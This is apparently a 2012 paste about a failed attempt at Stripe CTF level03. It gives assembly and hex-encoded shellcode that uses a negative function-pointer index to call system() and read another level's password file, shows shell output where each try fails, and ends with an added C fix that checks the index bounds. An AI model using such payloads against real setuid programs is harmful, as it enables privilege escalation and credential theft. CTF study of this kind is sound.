
xdissent's level03 fail for stripe ctf

a guest
Feb 24th, 2012
level03 fail - https://stripe.com/blog/capture-the-flag

Here's what I'm doing:
A negative 5 index points fns[index] to the (non-truncated) string on the stack, moving %eip there.
The %eax register already has the address of the buffer so I add the length of the payload before the command string and set that as the first value on the stack. Then it calls run() or system directly.

asm:
add $0xd,%eax
mov %eax,(%esp)
mov $0x0804875b,%eax
call *%eax

level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<run>"
0804875b <run>:
level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
Segmentation fault
level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -o level03 /levels/level03.c
level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
0804875b <run>:
level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
Segmentation fault
level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -fno-stack-protector -z execstack -o level03 /levels/level03.c
level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
080486fb <run>:
level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\xfb\x86\x04\x08\xff\xd0cat /home/level04/.password"`"
cat: /home/level04/.password: Permission denied
Segmentation fault
level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<system"
0804847c <system@plt>:
8048767: e8 10 fd ff ff call 804847c <system@plt>
level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x7c\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
Segmentation fault
level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<system"
08048430 <system@plt>:
8048707: e8 24 fd ff ff call 8048430 <system@plt>
level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x30\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
cat: /home/level04/.password: Permission denied
Segmentation fault
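
Added example, not part of the original paste and not the level03 source: the paste depends on fns[index] accepting a negative index, so this sketch shows a function-pointer dispatcher that validates the index at both ends before the indirect call. The handler names, the table contents and the parse_index/dispatch helpers are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

typedef int (*fn_ptr)(const char *);

/* Hypothetical handlers standing in for the program's real table entries. */
static int to_upper(const char *s)   { (void)s; return 1; }
static int to_lower(const char *s)   { (void)s; return 2; }
static int capitalize(const char *s) { (void)s; return 3; }

static const fn_ptr fns[] = { to_upper, to_lower, capitalize };
#define NUM_FNS (sizeof(fns) / sizeof(fns[0]))

/* Parse command-line text into a table index.
 * Returns 0 on success, -1 on malformed, negative or out-of-range input. */
int parse_index(const char *text, size_t *out)
{
    char *end;
    long v;

    if (text == NULL || *text == '\0')
        return -1;
    errno = 0;
    v = strtol(text, &end, 10);
    if (errno != 0 || *end != '\0')        /* overflow or trailing junk */
        return -1;
    if (v < 0 || (unsigned long)v >= NUM_FNS) /* lower AND upper bound */
        return -1;
    *out = (size_t)v;
    return 0;
}

/* Make the indirect call only after the index has been validated.
 * Returns the handler's result, or -1 if the index was rejected. */
int dispatch(const char *index_text, const char *arg)
{
    size_t idx;

    if (parse_index(index_text, &idx) != 0)
        return -1;
    return fns[idx](arg);
}

int main(void)
{
    printf("index 1 -> %d, index -5 -> %d\n",
           dispatch("1", "x"), dispatch("-5", "x"));
    return 0;
}
```

Storing the validated index in a size_t keeps later code from reintroducing a signed comparison that only checks the upper bound.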